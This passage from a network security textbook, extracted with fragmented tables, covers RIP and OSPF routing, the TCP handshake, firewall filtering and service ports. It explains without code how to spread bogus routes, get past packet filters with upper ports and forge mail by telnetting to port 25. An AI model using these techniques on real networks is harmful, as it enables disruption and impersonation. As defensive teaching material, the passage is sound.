Information Received by Router A \nRouter \nNetwork \nHops \nto \nGet \nTher\ne \nB \n3 \n1 \nB \n5 \n2 \nB \n6 \n3 \nB \n4 \n4 \nB \n2 \n5 \nC \n4 \n1 \nC \n6 \n2 \nC \n5 \n3 \nC \n3 \n4 \nC \n1 \n5 \nRouter A will then analyze this information, picking the lowest hop count to each network in order to build its own \nrouting table. Routes that require a larger hop count are not discarded but are retained in case an alternate route is \nrequired due to link failure. These higher hop values are simply ignored during the normal operation of the router. \nOnce complete, the table appears similar to Table 3.3. \nTable 3.3: Router A’s Routing Table \n" }, { "page_number": 39, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 39\nNetwork \nHops \nto \nGet \nTher\ne \nNext \nRouter \n1 \n1 \nDirect \nconnec\ntion \n2 \n1 \nDirect \nconnec\ntion \n3 \n2 \nB \n4 \n2 \nC \n5 \n3 \nB \n6 \n3 \nC \nAll we’ve done is to pick the lowest hop count to each network and added 1 to the advertised value. Once the table \nis complete, Router A will again broadcast two RIP packets, incorporating this new information. \nNow that Routers B and C have noted that there is a new router on the network, they must reevaluate their routing \ntables, as well. Before Router A came online, the table for Router B would have looked like Table 3.4. \nTable 3.4: Router B’s Routing Table before Router A Initializes \nNetwork \nHops \nto \nGet \nTher\ne \nNext \nRouter \n1 \n1 \nDirect \nconnec\ntion \n2 \n5 \nD \n3 \n1 \nDirect \nconnec\ntion \n4 \n4 \nD \n5 \n2 \nD \n6 \n3 \nD \nNow that Router A is online, Router B will modify its table to reflect the information shown in Table 3.5. \nTable 3.5: Router B’s Routing Table after Router A Initializes \nNetwork \nHops \nto \nGet \nTher\ne \nNext \nRouter \n1 \n1 \nDirect \nconnec\ntion \n2 \n2 \nA \n3 \n1 \nDirect \nconnec\n" }, { "page_number": 40, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 40\nTable 3.5: Router B’s Routing Table after Router A Initializes \nNetwork \nHops \nto \nGet \nTher\ne \nNext \nRouter \ntion \n4 \n3 \nA \n5 \n2 \nD \n6 \n3 \nD \nIt takes us two RIPs on the same logical network to get to this point. The first time Router A sent a RIP to Router \nB it only knew about Network 2, as you could see in Figure 3.7. It was not until Router C sent a reply RIP that \nRouter A had to send a second RIP frame to Router B, incorporating this new information. Table 3.5 would be \nbroadcast with only the direct common network information being removed (Network 1). This means that while \nRouter A was updating Router B with the information it had learned from Router C, it was also relaying back the \nroute information originally sent to it by that router (Router B). The only difference is that Router A has increased \nby 1 each hop count reported by Router B. \nBecause the hop value is larger than what Router B currently has in its tables, Router B would simply ignore this \ninformation. \nRouter C would go through a similar process, adjusting its table according to the information it receives from \nRouter A. Again, it will require two RIP frames on the same logical network to yield a complete view of our entire \nnetwork so that Router C can complete the changes to its tables. \nThese changes would then begin to propagate down through our network. Router B would update Router D when \nA first comes online and then again when it completes its tables. This activity would continue until all the routers \nhave an accurate view of our new network layout. The amount of time that is required for all our routers to \ncomplete their table changes is known as the time to convergence. The convergence time is important, because our \nrouting table is in a state of flux until all our routers become stabilized with their new tables. \nWarning \nKeep in mind that in a large network, convergence time can be quite long, as RIP \nupdates are only sent once or twice per minute. \nDistance Vector Routing Problems \nIt’s important to note that our distance vector routing table has been almost completely built on secondhand \ninformation. Any route that a router reports with a hop count greater than 1 is based upon what it has learned from \nanother router. When Router B tells Router A that it can reach Network 5 in two hops or Network 6 in three, it is \nfully trusting the accuracy of the information it has received from Router D. If, as a child, l you ever played the \ntelephone game (where each person in a line receives a whispered message and tries to convey it exactly to the \nnext), you quickly realize that secondhand information is not always as accurate as it appears to be. \nFigure 3.8 shows a pretty simple network layout. It consists of four logical networks separated by three routers. \nOnce the point of convergence is reached, each router will have created a routing table, as shown in the diagram. \n" }, { "page_number": 41, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 41\n \nFigure 3.8: Given the diagrammed network, each router would construct its routing table. \nNow, let’s assume that Router C dies a fiery death and drops offline. This will make Network 4 unreachable by all \nother network segments. Once Router B realizes that Router C is offline, it will review the RIP information it has \nreceived in the past, looking for an alternate route. This is where distance vector routing starts to break down. \nBecause Router A has been advertising that it can get to Network 4 in three hops, Router B simply adds 1 to this \nvalue and assumes it can now reach Network 4 through Router A. Relying on secondhand information clearly \ncauses problems: Router B cannot reach Network 4 through Router A, now that Router C is offline. \nAs you can see in Figure 3.9, Router B would now begin to advertise that it can now reach Network 4 in four \nhops. Remember that RIP frames do not identify how a router will get to a remote network, only that it can and \nhow many hops it will take to get there. Without knowing how Router A plans to reach Network 4, Router B has \nno idea that Router A is basing its route information on the tables it originally received from Router B. \nSo Router A would receive a RIP update from Router B and realize that it has increased the hop count to Network \n4 from two to four. Router A would then adjust its table accordingly and begin to advertise that it now takes five \nhops to reach Network 4. It would again RIP and Router B would again increase the hop count to Network 4 by \none. \n \nFigure 3.9: Router B incorrectly believes that it can now reach Network 4 through Router A and updates its \ntables accordingly. \nNote \nThis phenomenon is called count to infinity because both routers would continue to \nincrease their hop counts forever. Because of this problem, distance vector routing limits \nthe maximum hop count to 15. Any route that is 16 or more hops away is considered \nunreachable and is subsequently removed from the routing table. This allows our two \nrouters to figure out in a reasonable amount of time that Network 4 can no longer be \nreached. \nReasonable is a subjective term, however. Remember that RIP updates are only sent out once or twice per minute. \nThis means that it may be a minute or more before our routers buy a clue and realize that Network 4 is gone. With \na technology that measures frame transmissions in the micro-second range, a minute or more is plenty of time to \nwreak havoc on communications. For example, let’s look at what is taking place on Network 2 while the routers \nare trying to converge. \n" }, { "page_number": 42, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 42\nOnce Router C has dropped offline, Router B assumes that it has an alternative route to Network 4 through Router \nA. Any packets it receives are checked for errors and passed along to Router A. When Router A receives the \nframe, it performs an error check again. It then references its tables and realizes it needs to forward the frame to \nRouter B in order to reach Network 4. Router B would again receive the frame and send it back to Router A. \nThis is called a routing loop. Each router plays hot potato with the frame, assuming the other is responsible for its \ndelivery and passing it back and forth. While our example describes only one frame, imagine the amount of \nbandwidth lost if there is a considerable amount of traffic destined for Network 4. With all these frames looping \nbetween the two routers, there would be very little bandwidth available on Network 2 for any other systems that \nmay need to transmit information. \nFortunately, the network layer has a method for eliminating this problem, as well. As each router handles the \nframe, it is required to decrease a hop counter within the frame by 1. The hop counter is responsible for recording \nhow many routers the information has crossed. As with RIP frames, this counter has a maximum value of 15. As \nthe information is handled for the 16th time (the counter drops to 0) the router realizes that the information is \nundeliverable and simply drops the information. \nWhile this 16-hop limitation is not a problem for the average corporate network, it can be a severe limitation in \nlarger networks. For example, consider the vast size of the Internet. If RIP were used throughout the Internet, \ncertain areas of the Internet could not reach many resources. \nSecurity Concerns with RIP \nBesides our RIP routing tables being built upon secondhand information, note that this information is never \nactually verified. For example, if Router B claims to have the best route to a given network, none of the other \nrouters will verify this information. In fact, they do not even verify that this information was sent from Router B or \nthat Router B even exists! \nNeedless to say, this lack of verification can be a gaping security hole. It is not all that difficult to propagate bogus \nrouting information and bring an entire network to its knees. This is a clear example of how one savvy but \nmalicious user can interrupt communications for an entire network. \nBecause of this security concern and the other problems we’ve noted, many organizations use static routing or \nhave deployed link state routing protocols such as OSPF (Open Shortest Path First). Besides eliminating many of \nthe convergence problems found in RIP, OSPF also brings authentication to the table, requiring routers to supply a \npassword in order to participate in routing updates. While not infallible, this method does dramatically increase the \nsecurity in a dynamic routing environment. \nLink State Routing \nLink state routers function in a similar fashion to distance vector, but with a few notable exceptions. Most \nimportantly, link state routers use only firsthand information when developing their routing tables. Not only does \nthis help to eliminate routing errors, it drops the time to convergence to nearly zero. Imagine that our network \nfrom Figure 3.7 has been upgraded to using a link state routing protocol. Now let’s bring Router A online and \nwatch what happens. \nPropagating Network Information with Link State \nAs Router A powers up, it sends out a type of RIP packet referred to as a hello. The hello packet is simply an \nintroduction that states, “Greetings! I am a new router on this network; is there anybody out there?” This packet is \ntransmitted on both of its ports and will be responded to by Routers B and C. \nOnce Router A receives a reply from Routers B and C, it creates a link state protocol (LSP) frame and transmits it \nto Routers B and C. An LSP frame is a routing maintenance frame that contains the following information: \nƒ \nThe router’s name or identification \nƒ \nThe networks it is attached to \nƒ \nThe hop count or cost of getting to each network \nƒ \nAny other routers on each network that responded to its hello frame \nRouters B and C would then make a copy of Router A’s LSP frame and forward the frame in its entirety along \nthrough the network. Each router receiving Router A’s LSP frame would then copy the information and pass it \nalong. With link state routing, each router maintains a copy of every other router’s LSP frame. The router can use \nthis information to diagram the network and thus build routing tables. Because each LSP frame contains only the \n" }, { "page_number": 43, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 43\nroute information that is local to each router that sent it, this network map is created strictly from firsthand \ninformation. A router will simply fit the LSP puzzle pieces together until its network picture is complete. \nRouter A would then make an LSP frame request from either Router B or C. An LSP frame request is a query \nrequesting that the router forward a copy of all known LSP frames. Because each router has a copy of all LSP \nframes, either router is capable of supplying a copy from every router on the network. This avoids making Router \nA request this information from each router individually, thus saving bandwidth. Once an LSP network is up and \nrunning, updates are only transmitted every two hours or whenever a change takes place (such as a router going \noffline). \nConvergence Time with Link State \nOur link state network is up and running. Note that Routers B and C were not required to recompute their routing \ntables. They simply added the new piece from Router A and continued to pass traffic. This is why convergence \ntime is nearly zero. The only change required of each router is to add the new piece to its tables. Unlike distance \nvector, updates were not required in order to normalize the routing table. Router B did not need a second packet \nfrom Router A, telling it what networks were available through Router C. Router B simply added Router A’s LSP \ninformation to its existing table and was already aware of the links. \nRecovering from a Router Failure in a Link State Environment \nLet’s revisit Figure 3.9 to look at how link state routing reacts when a router goes offline. Again, for the purpose \nof this example let’s assume that our routing protocol has been upgraded from distance vector to link state. Let’s \nalso assume that our routing tables have been created and that traffic is passing normally. \nIf Router C is shut down normally, it will transmit a maintenance frame (known as a dying gasp) to Router B, \ninforming it that it is about to go offline. Router B would then delete the copy of Router C’s LSP frame that it has \nbeen maintaining and forward this information along to Router A. Both routers now have a valid copy of the new \nnetwork layout and realize that Network 4 is no longer reachable. If Router C is not brought down gracefully but \nagain dies a fiery death, there would be a short delay before Router B realizes that Router C is no longer \nacknowledging packets sent to it. At this point Router B would realize that Router C is offline. It would then \ndelete Router C’s LSP frame from its table and forward the change along to Router A. Again, both systems have a \nvalid copy of the new network layout. Because we are dealing with strictly firsthand information, there are none of \nthe pesky count-to-infinity problems that we experienced with distance vector. Our router tables are accurate, and \nour network is functioning with a minimal amount of updating. This allows link state to traverse a larger number \nof network segments. The maximum is 127 hops, but this can be fewer, depending on the implementation. \nSecurity with Link State Routing \nMost link state routing protocols support some level of authenticating the source of dynamic route updates. While \nit is not impossible to incorporate this functionality into distance vector routing, most distance vector routing \nprotocols predate the need to authenticate routing table updates. Authentication is an excellent means of insuring \nthat each router only accepts routing table updates from a trusted host. While authentication is not 100 percent \nsecure, it is a far cry from trusting every host on the wire. \nFor example, OSPF supports two levels of authentication: password and message digest. Password authentication \nrequires each router that will be exchanging route table information to be preprogrammed with a password. When \na router attempts to send OSPF routing information to another router, it includes the password string as \nverification. Routers using OSPF will not accept route table updates unless the password string is included in the \ntransmission. This helps to insure that table updates are only accepted from trusted hosts.The drawback to this \nauthentication method is that the password is transmitted as clear text. This means that an attacker who is \nmonitoring the network with a packet analyzer can capture the OSPF table updates and discover the password. An \nattacker who knows the password can use it to pose as a trusted OSPF router and transmit bogus routing table \ninformation. \nMessage digest is far more secure in that it does not exchange password information over the wire. Each OSPF \nrouter is programmed with a password and a key-ID. Prior to transmitting an OSPF table update, a router will \nprocess the OSPF table information, password, and key-ID through an algorithm in order to generate a unique \nmessage digest, which is attached to the end of the packet. The message digest provides an encrypted method of \nverifying that the router transmitting the table can be considered a trusted host. When the destination router \nreceives the transmission, the destination router uses the password and key-ID it has been programmed with to \nvalidate the message digest. If the message is authentic, the routing table update is accepted. \nTip \nWhile it is possible to crack the encryption used by OSPF, doing so takes time and \nlots of processing power. This makes OSPF with message digest authentication an \nexcellent choice for updating dynamic routing information over insecure networks. \nConnectionless and Connection-Oriented Communications \n" }, { "page_number": 44, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 44\nWe can now get our information from Point A to Point B, regardless of whether the systems are located on the \nsame logical network. This raises the question, “Once we get there, how do we carry on a proper conversation?” \nThis is where the transport layer comes in. \nThe transport layer is where we begin to set down the rules of communication etiquette. It’s not enough that we \ncan get this information from one system to another; we also have to insure that both systems are operating at the \nsame level of decorum. \nAs an analogy, let’s say you pull up to the finest restaurant in the city in your GMC Pacer and proceed to the front \ndoor sporting your best set of leather chaps, Harley jacket, and bandanna. Once inside, you greet the maitre d’ with \n“Yo wimp, gimme a table and some grub, NOW!” Surprisingly, you’re escorted out of the restaurant at gunpoint. \nWhat went wrong? Why, you employed improper etiquette, of course—everyone knows the correct term is not \n“grub” but “escargot.” \nYou can avoid such verbal breakdown, as well as those in network communications, by insuring that all parties \ninvolved are communicating at the same level of etiquette. There are two forms of network communication \netiquette: \nƒ Connection-oriented \nƒ Connectionless \nConnection-Oriented Communications \nA connection-oriented communication exchanges control information referred to as a handshake prior to \ntransmitting data. The transport layer uses the handshake to insure that the destination system is ready to receive \ninformation. A connection-oriented exchange will also insure that data is transmitted and received in its original \norder. \nModems are heavy users of connection-oriented communications, as they need to negotiate a connection speed \nprior to sending any information. In networking, this functionality is accomplished through the use of a transport \nlayer field referred to as a flag in the IP and AppleTalk world or as a connection control field under IPX. Only \nconnection-oriented communications use these fields. When IP is the underlying routing protocol, TCP is used to \ncreate connection-oriented communications. IPX uses SPX, and AppleTalk uses ATP to provide this functionality. \nAs a communication session is started, the application layer (not necessarily the program you are using) will \nspecify if it needs to use a connection-oriented protocol. Telnet is just such an application. When a telnet session is \nstarted, the application layer will request TCP as its transport service in order to better insure reliability of the \nconnection. Let’s look at how this session is established to see how a handshake works. \nThe TCP Three-Packet Handshake \nAt your workstation you type in telnet thor.foobar.com to establish a remote connection to that system. As the \nrequest is passed down through the transport layer, TCP is selected to connect the two systems so that a \nconnection-oriented communication can be established. The transport layer sets the synchronization (SYN) flag to \n1 and leaves all other flags at 0. IP uses multiple flag fields and uses the binary system to set values. This means \nthat the only possible values of an IP flag are 1 and 0. IPX and AT use a hexadecimal value, as their frames only \ncontain one flag field. This allows the one field to contain more than two values. \nBy setting SYN to 1 and all other fields to 0, we let the system on the other end (thor.foobar.com) know that we \nwish to establish a new communication session with the system. This request would then be passed down the \nremaining layers, across the wire to the remote system, and then up through its OSI layers. \nIf the service is available on the remote system (more on services in a moment), the request is acknowledged and \nsent back down the stack until it reaches the transport layer. The transport layer would then set the SYN flag to 1, \nas did the originating system, but it will also set the acknowledgment (ACK) flag to 1. This lets the originating \nsystem know that its transmission was received and that it’s OK to send data. The request is then passed down the \nstack and over the wire back to the original system. \nThe original system would then set the SYN flag to 0 and the ACK flag to 1 and transfer this frame back to Thor. \nThis lets Thor know, “I’m acknowledging your acknowledgment and I’m about to send data.” At this point, data \nwould be transferred, with each system being required to transmit an acknowledgment for each packet it receives. \nFigure 3.10 shows a telnet session from the system Loki to the system Thor. Each line represents a different frame \nthat has been transmitted from one system to the other. Source and destination systems are identified, as well as \nsome summary information about the frame. Notice that the first three frames are identified as TCP frames, not \ntelnet, and that they perform the handshaking just described. Once TCP establishes the connection-oriented \nconnection, then telnet can step in to transfer the data required. The TCP frames that appear later in the \nconversation are for acknowledgment purposes. As stated, with a connection-oriented protocol every frame must \nbe acknowledged. If the frame was a request for information, the reply can be in the form of delivering the \n" }, { "page_number": 45, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 45\nrequested information. If a frame is sent that does not require a reply, however, the destination system is still \nrequired to acknowledge that the frame was received. \n \nFigure 3.10: An example of a connection-oriented communication \nIf you’re still a bit fuzzy on handshaking and connection-oriented communications, let’s look at an analogy. Let’s \nsay you call a friend to inform him you’ll be having a network Quake party on Saturday night and that he should \ncome by with his laptop. You follow these steps: \nƒ \nYou dial your friend’s phone number (SYN=1, ACK=0). \nƒ \nYour friend answers the phone and says, “Hello” (SYN=1, ACK=1). \nƒ \nYou reply by saying, “Hi, Fred, this is Dave” (SYN=0, ACK=1). \nYou would then proceed to transfer your data about your upcoming party. Every time you pause, Fred would \neither transfer back information (“Yes, I’m free Saturday night.”) or send some form of acknowledgment (ACK) \nto let you know he has not yet hung up. \nWhen the conversation is complete, you would both tear down the connection by saying goodbye, which is a \nhandshake to let each other know that the conversation is complete and that it’s OK to hang up the phone. Once \nyou hang up, your connection-oriented communication session is complete. \nThe purpose of connection-oriented communications is simple. They provide a reliable communication session \nwhen the underlying layers may be considered less than stable. Insuring reliable connectivity at the transport layer \nhelps to speed up communication when data becomes lost. This is because the data does not have to be passed all \nthe way up to the application layer before a retransmission frame is created and sent. While this is important in \nmodem communications, where a small amount of noise or a crossed line can kill a communication session, it is \nnot as useful with network-based communication. TCP and SPX originate from the days when the physical and \ndata-link layers could not always be relied on to successfully transmit information. These days, this is less of a \nconcern because reliability has increased dramatically from the earlier years of networking. \nConnectionless Communications \nA connectionless protocol does not require an initial handshake or acknowledgments to be sent for every packet. \nWhen you use a connectionless transport, it makes its best effort to deliver the data but relies on the stability of the \nunderlying layers, as well as application layer acknowledgments, to insure that the data is delivered reliably. IP’s \nUser Datagram Protocol (UDP) and IPX’s NetWare Core Protocol (NCP) are examples of connectionless \ntransports. Both protocols rely on connectionless communications to transfer routing and server information, as \nwell. While AppleTalk does not utilize connectionless communication for creating data sessions, AppleTalk does \nuse it when advertising servers with its name binding protocol (NBP). Broadcasts are always transmitted using a \nconnectionless transport. \nAs an example of connectionless communications, check out the network file system (NFS) session in Figure 3.11. \nNFS is a service that allows file sharing over IP. It uses UDP as its underlying transport protocol. Notice that all \ndata acknowledgments are in the form of a request for additional information. The destination system (Thor) \nassumes that the last packet was received if the source system (Loki) requests additional information. Conversely, \nif Loki does not receive a reply from Thor, NFS takes care of requesting the information again. As long as we \nhave a stable connection that does not require a large number of retransmissions, allowing NFS to provide error \ncorrection is a very efficient method of communicating because it does not generate unnecessary \nacknowledgments. \n" }, { "page_number": 46, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 46\n \nFigure 3.11: NFS uses UDP to create a connectionless session. \nLet’s look at another analogy to see how this type of communication differs from the connection-oriented one \ndescribed earlier. Again, let’s say you call Fred to invite him and his laptop to your network Quake party on \nSaturday night. You call Fred’s number but this time get his answering machine. You leave a detailed message \nindicating when the party will take place and what he should bring. Unlike the first call, which Fred answered, you \nare now relying on \nƒ \nYour ability to dial the correct phone number, as you did not reach your friend to confirm \nthat this number was in fact his \nƒ \nThe fact that the phone company did not drop your phone connection in the middle of your \nmessage (answering machines do not ACK—unless, of course, you talk until the beep cuts \nyou off) \nƒ \nThe answering machine’s proper recording of the message—without eating the tape \nƒ \nThe ability of Fred’s cat to discern between the tape and a ball of yarn \nƒ \nThe absence of a power failure (which would cause the machine to lose the message) \nƒ \nFred’s retrieval of this message between now and the date of the party \nAs you can see, you have no real confirmation that your friend will actually receive the message. You are counting \non the power company, the answering machine, and so on, to enable Fred to get your message in a timely manner. \nIf you wanted to insure the reliability of this data transmission you could send an application layer \nacknowledgment request in the form of “Please RSVP by Thursday.” If you did not get a response by then, you \ncould try transmitting the data again. \nSo, which is a better transport to use: connectionless or connection-oriented? Unfortunately, the answer is \nwhichever one your application layer specifies. If telnet wants TCP, you cannot force it to use UDP. \nSecurity Implications \nOne technology that has made good use of the flag field of connection-oriented communications is firewalls. A \nfirewall will use the information in the flag field to determine if a connection is inbound or outbound and, based \non its rule table, either accept or deny the connection. \nFor example, let’s say our firewall rules allow internal users access to the Internet but block external users from \naccessing internal systems. This is a pretty common security policy. How do we accomplish this? \nWe cannot simply block all inbound traffic, because this would prohibit our internal users from ever receiving a \nreply to their data requests. We need some method of allowing replies back in while denying external systems the \nability to establish connections with internal systems. The secret to this is our TCP flags. \nRemember that a TCP-based session needs to handshake prior to sending data. If we block all inbound frames that \nhave the SYN field set to 1 and all other fields set to 0, we can prevent any external user from establishing a \nconnection with our internal system. Because these settings are only used during the initial handshake and do not \nappear in any other part of the transmission, it is an effective way of blocking external users. If external users \ncannot connect to an internal system, they cannot transmit data to or pull data from that system. \nNote \nMany firewalls will deny all UDP connections—UDP does not have a flag field, and most \nfirewalls have no effective way of determining if the data is a connection request or a \n" }, { "page_number": 47, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 47\nreply. This is what has made dynamic packet filtering firewalls so popular: they monitor \nand remember all connection sessions. With dynamic packet filtering you can create a \nfilter rule that accepts UDP packets from an external host only when that host has been \npreviously queried for information using UDP. This insures that only UDP replies are \nallowed back in past the firewall. While a packet filter or some proxy firewalls can only \neffectively work with TCP connections, a dynamic packet filtering firewall can safely \npass UDP as well. \n \nNetwork Services \nWe can now find our remote system and insure that both systems are using the same level of communications. \nNow, how do we tell the server what we want? While computers are powerful tools—capable of processing many \nrequests per second—they still have a problem with the phrase, “You know what I mean?” This is why we need a \nway to let a system know exactly what we want from it. It would be a real bummer to connect to a slick new Web \nsite only to have the server start spewing e-mail or routing information at you because it had no idea which of its \ndata you’re looking for. \nTo make sure the computer knows what you want from it, you need to look to the session layer. \nNote \nYou may remember from our discussion of the session layer that it is the layer responsible \nfor insuring that requests for service are formulated properly. \nA service is a process or application that runs on a server and provides some benefit to a network user. E-mail is a \ngood example of a value-added service. A system may queue your mail messages until you connect to the system \nwith a mail client in order to read them. File and print sharing are two other common examples of network \nservices. \nServices are accessed by connecting to a specific port or socket. Think of ports as virtual mail slots on the system \nand you’ll get the idea. A separate mail slot (port number) is designated for each service or application running on \nthe system. When a user wishes to access a service, the session layer is responsible for insuring that the request \nreaches the correct mail slot or port number. \nOn a UNIX or NT system, IP port numbers are mapped to services in a file called (oddly enough) services. An \nabbreviated output of a services file is shown in Table 3.6. The first column identifies the service by name, while \nthe second column identifies the port and transport to be used. The third column is a brief description of the \nfunctionality provided by the service. Table 3.6 is only a brief listing of IP services. More information can be \nfound in request for comment (RFC) 1700. \nTable 3.6: An Abbreviated Services File \nName of Service \nPort \nand \nTransp\nort \nFunctionality \nftp-data \n20/tcp \nUsed to \ntransfer \nactual file \ninformation \nftp \n21/tcp \nUsed to \ntransfer \nsession \ncommands \ntelnet \n23/tcp \nCreates a \nremote \nsession \nsmtp \n25/tcp \nE-mail \ndelivery \nwhois \n43/tcp \nInternic \ndomain \nname lookup \n" }, { "page_number": 48, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 48\nTable 3.6: An Abbreviated Services File \nName of Service \nPort \nand \nTransp\nort \nFunctionality \ndomain \n53/tcp \nDomain \nname \nqueries \ndomain \n53/udp \nDNS zone \ntransfers \nbootps \n67/udp \nbootp server \nbootpc \n68/udp \nbootp client \npop3 \n110/tcp \nPostOffice \nV.3 \nnntp \n119/tcp \nNetwork \nNews \nTransfer \nntp \n123/tcp \nNetwork \nTime \nProtocol \nntp \n123/udp \nNetwork \nTime \nProtocol \nnetbios-ns \n137/tcp \nnbns \nnetbios-ns \n137/udp \nnbns \nnetbios-dgm \n138/tcp \nnbdgm \nnetbios-dgm \n138/udp \nnbdgm \nnetbios-ssn \n139/tcp \nnbssn \nsnmp \n161/udp \nSimple \nNetwork \nManagemen\nt protocol \nsnmp-trap \n162/udp \nSimple \nNetwork \nManagemen\nt protocol \nNote \nThese port numbers are not UNIX-specific. For example, any operating system using \nSMTP should use port 25. \nAccording to the file summarized in Table 3.6, any TCP request received on port 23 is assumed to be a telnet \nsession and is passed up to the application that handles remote access. If the requested port is 25, it is assumed that \nmail services are required and the session is passed up to the mail program. \nThe file in Table 3.6 is used on UNIX systems by a process called the Internet daemon (inetd). Inetd monitors \neach of the listed ports on a UNIX system and is responsible for waking up the application that provides services \nto that port. This is an efficient means of managing the system for infrequently accessed ports. The process is only \nactive and using system resources (memory, CPU time, and so on) when the service is actually needed. When the \nservice is shut down, the process returns to a sleep mode, waiting for inetd to call on it again. \nApplications that receive heavy use should be left running in a constant listening mode. For example, Web server \naccess usually uses port 80. Note that it is not listed in the services file in Table 3.6 as a process to be handled by \ninetd. This is because a Web server may be called upon to service many requests in the course of a day. It is more \nefficient to leave the process running all the time than to bother inetd every time you receive a page request. \n" }, { "page_number": 49, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 49\nAll of these port numbers are referred to as well-known ports. Well-known ports are de facto standards used to \ninsure that everyone can access services on other machines without needing to guess which port number is used by \nthe service. For example, there is nothing stopping you from setting up a Web server on port 573, provided that the \nport is not in use by some other service. The problem is that most users will expect the service to be available on \nport 80 and may be unable to find it. Sometimes, however, switching ports may be done on purpose—we will look \nat that in just a minute. \nNote \nDe facto standard means that it is a standard by popularity; it is not a rule or law. \nPorts 0–1023 are defined by the Internet Assigned Numbers Authority (IANA) for most well-known services. \nWhile ports have been assigned up to 7200, the ports below 1024 make up the bulk of Internet communications. \nThese assignments are not hard-and-fast rules; rather, they are guides to insure that everyone offers public services \non the same port. For example, if you want to access Microsoft’s Web page you can assume it offers the service on \nport 80, because this is the well-known port for that service. \nWhen a system requests information, it not only specifies the port it wishes to access but also which port should be \nused when returning the requested information. Port numbers for this task are selected from 1024 to 65535 and are \nreferred to as upper port numbers. \nTo illustrate how this works, let’s revisit our telnet session in Figure 3.10. When Loki attempts to set up a telnet \nsession with Thor, it will do so by accessing port 23 on Thor (port 23 is the well-known service port for telnet). If \nwe look at frame number 2, we see that Thor is sending the acknowledgment (ACK) back on port 1042. This is \nbecause the session information in the original frame that Loki sent Thor specified a source port of 1042 and a \ndestination port of 23. The destination port identified where the frame was going (port 23 on Thor), while the \nsource port identified which port should be used when sending replies (port 1042 on Loki). Port 23 is our well-\nknown service port, while port 1042 is our upper port number used for the reply. \nUpper reply ports are assigned on the fly. It is nearly impossible to predict which upper port a system will request \ninformation to be received on, as the ports are assigned based on availability. It is for this reason that packet filters \nused for firewalling purposes are sometimes incorrectly set up to leave ports above 1023 open all the time in order \nto accept replies. \nThis leads to one of the reasons why a port other than a well-known port may be used to offer a service. A savvy \nend user who realizes that a packet filter will block access to the Web server running on her system may assign the \nservice to some upper port number like 8001. Because the connection will be made above port 1023, it may not be \nblocked. The result is that despite your corporate policy banning internal Web sites and a packet filter to help \nenforce it, this user can successfully advertise her Web site provided she supplies the port number (8001) along \nwith the universal resource locator (URL). The URL would look similar to this: \nhttp://thor.foobar.com:8001 \nThe :8001 tells your Web browser to access the server using port 8001 instead of 80. Because most packet filters \nhave poor logging facilities, the network administrator responsible for enforcing the policy of \"no internal Web \nsites\" would probably never realize it exists unless he stumbles across it. \nTip \nThe next time your boss accuses you of wasting time by cruising the Web, correct her by \nreplying, “I am performing a security audit by attempting to pursue links to renegade \ninternal sites which do not conform to our corporate security policy. This activity is \nrequired due to inefficiencies in our firewalling mechanism.” If you’re not fired on the spot, \nquickly submit a PO for a new firewall while the event is fresh in the boss’ mind. \nSpeaking of switching port numbers, try to identify the session in Figure 3.12. While the session is identified as a \nSimple Mail Transfer Protocol (SMTP), it is actually a telnet session redirected to port 25 (the well-known port for \nSMTP). We’ve fooled the analyzer recording this session into thinking that we simply have one mail system \ntransferring mail to another. Most firewalls will be duped in the same fashion because they use the destination port \nto identify the session in progress—they do not look at the actual applications involved. This type of activity is \nusually analogous to someone spoofing or faking a mail message. Once I’ve connected to the remote mail system, \nI’m free to pretend the message came from anywhere. Unless the routing information in the mail header is checked \n(most user-friendly mail programs simply discard this information), the actual origin of this information cannot be \ntraced. \n" }, { "page_number": 50, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 50\n \nFigure 3.12: While this looks like a normal transfer of mail, it is actually someone spoofing a mail message \nto the destination system. \nSuch spoofing is what has made intrusion detection systems (IDS) so popular—they can be programmed to catch \nthis type of activity. Look at Figure 3.12 again, but this time check out the frame size used by the transmitting \nsystem. Notice that the largest frame sent is 122 bytes. This indicates a telnet session, as telnet requires that each \ncharacter typed be acknowledged. Had this been an actual mail system transferring data, we would have seen \npacket sizes closer to 1,500 bytes, because SMTP does not require that only a single character be sent in every \nframe. A good IDS can be tuned to identify such inconsistencies. \nFigure 3.13 shows the final output of this spoofing session. Without the header information, I might actually \nbelieve this message came from bgates@microsoft.com. The fact that the message was never touched by a \nmail system within the Microsoft domain indicates that it is a phony. I’ve used this example in the past when \ninstructing Internet and security classes. Do not believe everything you read, especially if it comes from the \nInternet! \n \nFigure 3.13: The output from our spoofed mail message \nPort numbers are also used to distinctly identify similar sessions between systems. For example, let’s build on \nFigure 3.10. We already have one telnet session running from Loki to Thor. What happens if four or five more \nsessions are created? All sessions have the following information in common: \nSource IP address: 10.2.2.20 (loki.foobar.com) \nDestination IP address: 10.2.2.10 (thor.foobar.com) \nDestination port: 23 (well-known port for telnet) \nThe source ports will be the only distinctive information that can be used to identify each individual session. Our \nfirst connection has already specified a source port of 1042 for its connection. Each sequential telnet session that is \nestablished after that would be assigned some other upper port number to uniquely identify it. The actual numbers \nassigned would be based upon what was not currently being used by the source system. For example, ports 1118, \n1398, 4023, and 6025 may be used as source ports for the next four sessions. The actual reply port number does \nnot really matter; what matters is that it can uniquely identify that specific session between the two systems. If we \nwere to monitor a number of concurrent sessions taking place, the transaction would look similar to Figure 3.14. \nNow we see multiple reply ports in use to identify each session. \n" }, { "page_number": 51, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 51\n \nFigure 3.14: Multiple telnet sessions in progress between Loki and Thor \nIP is not the only protocol to use ports. AppleTalk and IPX also use ports, which are referred to as sockets. Unlike \nIP and AT, which use decimal numbers to identify different ports, IPX uses hexadecimal numbers. Well-known \nand upper ports function the same with AppleTalk and IPX as they do with IP. AppleTalk and IPX simply do not \nhave as many services defined. \nFile Transfer Protocol (FTP): The Special Case \nIn all of our examples so far, the source system would create a single service connection to the destination system \nwhen accessing a specific service. Unless multiple users requested this service, only a single connection session \nwas required. 